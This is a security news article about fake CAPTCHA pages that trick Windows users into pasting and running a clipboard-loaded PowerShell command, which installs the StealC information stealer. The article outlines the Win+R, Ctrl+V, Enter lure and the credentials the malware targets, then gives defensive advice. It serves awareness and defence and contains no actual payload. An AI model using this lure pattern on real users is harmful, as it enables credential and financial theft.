Fake CAPTCHA Pages Used to Deliver Stealthy Malware

Security checks that users trust are being repurposed as malware traps. According to security researchers at LevelBlue, fake CAPTCHA pages guide users through a deceptive command sequence to install the stealthy StealC Information Stealer on Windows PCs. Once active, the malware can harvest credentials from browsers, Outlook, Steam, and cryptocurrency wallets.

Malware Delivery Method

Attackers create pages that mimic normal verification prompts. Users encounter the familiar “I’m not a robot” CAPTCHA flow, followed by seemingly helpful but malicious instructions.

1. Victims are instructed to press the Win + R keyboard shortcut to open the Run dialog.
2. Next, they are told to press Ctrl + V, which pastes a hidden payload into the dialog.
3. The payload is a malicious PowerShell command that has been preloaded into the clipboard by the fake page.
4. Finally, pressing Enter executes the command, initiating the malware infection chain.

Researchers note that this method relies on user behavior and trusted interface patterns, rather than exploiting zero-day vulnerabilities. As such, it constitutes a behavioral attack rather than a classic software exploit.

Focus on Credential Theft

Once installed, the StealC malware prioritizes credential theft. It targets browser-stored passwords, cookies, and session tokens, which can grant attackers rapid access to multiple services. Additionally, it seeks to compromise:

• Outlook credentials: exposing both personal and business communications.
• Steam accounts: including stored payment details.
• Cryptocurrency wallets: enabling direct financial theft.

This broad target set allows attackers to chain further malicious activities, such as resetting passwords using stolen email access, committing fraud, or performing identity theft using browser and wallet data.

An Ongoing Pattern

Researchers emphasize that this is not an isolated incident. Similar social-engineering tactics have been observed since 2024, indicating a sustained interest from cybercriminals. CERT Polska reports an “increasing number of attacks” in Poland, highlighting active infrastructure use and regional targeting. The observed trends suggest that attackers find this method effective enough to continue refining and expanding it.

Related campaigns include ClickFix activity, where fake Windows update prompts delivered information stealers through the same Win + R pattern. Earlier instances also involved fake CAPTCHA pages and counterfeit app lures, such as the delivery of Lumma Stealer. Together, these cases frame ClickFix as an evolving attack framework rather than a single campaign.

Expert Analysis and Recommendations

Windows Central brought attention to this fake CAPTCHA wave for mainstream audiences, while security experts at LevelBlue provided detailed technical analysis of the delivery mechanics and payload behavior. CERT Polska warns that a single successful click path can expose entire networks, as no software vulnerability is required for this type of attack. Patching alone cannot address the underlying issue.

Legitimate CAPTCHA flows do not ask users to open Run dialogs or execute system commands. Any page that requests actions like Windows key + R, clipboard pasting, or command execution should be treated as malicious. Users encountering such prompts are advised to:

• Immediately close the tab and avoid completing any steps.
• Overwrite clipboard contents with benign text.
• Run a full security scan if any part of the sequence was followed.

However, security tools may struggle to detect clipboard-driven social-engineering attacks in real time. Attackers exploit legitimate OS functions to bypass automated defenses. As a result, user awareness remains a critical line of defense. Organizations should include this attack pattern in their security training to ensure employees recognize that valid websites do not require command-line style verification processes.